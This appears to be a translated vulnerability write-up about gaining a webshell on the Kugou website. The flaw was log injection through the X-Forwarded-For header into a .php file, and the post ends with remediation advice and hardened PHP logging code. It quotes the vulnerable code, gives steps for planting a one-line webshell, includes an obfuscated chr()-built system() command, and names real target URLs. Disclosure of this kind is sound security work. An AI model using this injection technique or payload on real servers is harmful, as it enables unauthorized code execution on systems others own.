Last night I was able to getshell the Kugou main site (fast repair speed)
After a sleep, I got up and found that the vulnerability had been fixed. Do you have to be this fast on a weekend!!!!!
The problem is that a backup file was found on the Kugou main site:
http://www.kugou.com/www.kugou.com.tar.gz
Next, I looked through the old backup of the main site.
I was prepared to submit it first, but I found that the backup had been deleted after a while.
On the 9th, you can find a direct getshell:
errorPage/pc_errorhelp.php
errorPage/pc_errorhelp2.php
$preg = '/Windows NT (\d)/U';
@preg_match($preg, $_SERVER['HTTP_USER_AGENT'], $match);
$win = empty($match[1]) ? 5 : (int) $match[1];
$isFirstTime = empty($_COOKIE['ieor']);
@setcookie("IEor", 1, time() + 3600*24, '/', '.kugou.com'); // fallback check: whether the cookie can be written normally
$log = date('Y-m-d H:i:s') . "\t" . mygetIP() . "\t" . $ver . "\t" . $win . "\t" . ($isFirstTime ? "First" : "NotF") . PHP_EOL;
// The log line is appended to a .php file inside the web root
@file_put_contents('help_log.php', $log, FILE_APPEND);
function mygetIP() {
    $realIP = FALSE;
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) {
        $realIP = $_SERVER['HTTP_CLIENT_IP'];
    }
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $ips = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        foreach ($ips as $ip) {
            $ip = trim($ip);
            if (!isLAN($ip)) { // non-LAN
                // The header value is taken as-is, with no check that it is an IP address
                $realIP = $ip;
                break;
            }
        }
    }
    // ... the rest of the function is not shown in the post
}
Add a one-liner (one-sentence webshell) to X-Forwarded-For.
Then access http://www.kugou.com/errorPage/help_log.php (it loads extremely slowly).
Searching for 99999 proves it was successful.
You can also execute commands:
x=system(chr(108).chr(115).chr(32).chr(45).chr(108).chr(97));
I got sleepy; it was already early morning. I got up and found that the vulnerability had been fixed. I didn't expect the repair speed to be so amazing.
An SVN leak is also provided:
fyb.kugou.com
Solution:
Do not store backups in the web root directory.
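
The logging code itself also needs fixing, since it writes a request header into a `.php` file. A hardened version of that logic, as an added example that is not code from the post or from the site: `LOG_FILE`, `safeClientIP` and `buildLogLine` are assumed names, the sample request is constructed, and the `$ver` field is left out because the excerpt does not define it.

```php
<?php
// Added example (not the site's code). LOG_FILE is a hypothetical path
// outside the document root, with an extension the server will not execute.
const LOG_FILE = '/var/log/webapp/help_log.txt';

// Return a syntactically valid, non-private client IP from the forwarding
// headers, falling back to the socket peer address. Header values are
// attacker-controlled, so anything that is not an IP literal is discarded
// instead of being written to the log.
function safeClientIP(array $server): string
{
    $candidates = [];
    if (!empty($server['HTTP_CLIENT_IP'])) {
        $candidates[] = $server['HTTP_CLIENT_IP'];
    }
    if (!empty($server['HTTP_X_FORWARDED_FOR'])) {
        $candidates = array_merge($candidates, explode(',', $server['HTTP_X_FORWARDED_FOR']));
    }
    foreach ($candidates as $candidate) {
        $ip = filter_var(trim($candidate), FILTER_VALIDATE_IP, FILTER_FLAG_NO_PRIV_RANGE);
        if ($ip !== false) {
            return $ip;
        }
    }
    $peer = filter_var($server['REMOTE_ADDR'] ?? '', FILTER_VALIDATE_IP);
    return $peer !== false ? $peer : '-';
}

// Build one tab-separated log line; every field is either typed or validated.
function buildLogLine(array $server, array $cookies): string
{
    preg_match('/Windows NT (\d)/U', $server['HTTP_USER_AGENT'] ?? '', $match);
    $win = empty($match[1]) ? 5 : (int) $match[1];
    $first = empty($cookies['ieor']) ? 'First' : 'NotF';
    return implode("\t", [date('Y-m-d H:i:s'), safeClientIP($server), $win, $first]) . PHP_EOL;
}

// Constructed request: the first forwarded entry carries PHP tags, not an IP.
$sample = [
    'HTTP_X_FORWARDED_FOR' => '<?php /* constructed */ ?>, 203.0.113.7',
    'HTTP_USER_AGENT'      => 'Mozilla/5.0 (Windows NT 6.1)',
    'REMOTE_ADDR'          => '198.51.100.20',
];
// Printed here so the example runs anywhere; a real handler would call
// file_put_contents(LOG_FILE, $line, FILE_APPEND | LOCK_EX) instead.
echo buildLogLine($sample, []);
```

The entry containing PHP tags fails `FILTER_VALIDATE_IP` and never reaches the log, and even a line that did slip through would sit in a file the web server neither serves nor interprets.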